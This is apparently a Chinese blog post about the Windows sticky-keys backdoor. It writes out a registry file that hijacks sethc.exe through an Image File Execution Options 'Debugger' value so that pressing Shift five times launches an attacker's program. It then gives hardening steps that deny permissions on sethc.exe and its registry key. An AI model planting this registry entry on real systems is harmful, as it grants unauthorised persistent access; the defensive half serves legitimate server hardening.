| 关键词: Windows exe shift 安全 CurrentVersion 注册表 sethc Execution Microsoft winshell |
今天群里朋友发我个shift后门,带镜像劫持的,可以按5下shift,然后输入密码.5下shift → 不关闭 → 然后鼠标右键点出来的那个框框右下角...前提是先运行个p处理或reg,这个方法比较牛X..注册表如下 Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]"Debugger"="C:\\www.winshell.cn.exe" 这个exe存的路径是:c:\\www.winshell.cn.exe -----------------------------------------------------以下是安全设置---------------------------知道上边原理:就可以设置安全了....在服务器里按5下shift,出设置把所有的对号去掉.删除所有文件安全设置下用户,加everyone设置全部拒绝C:\WINDOWS\system32和C:\WINDOWS\system32\dllcache的sethc.exe修改注册表权限,同上.HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|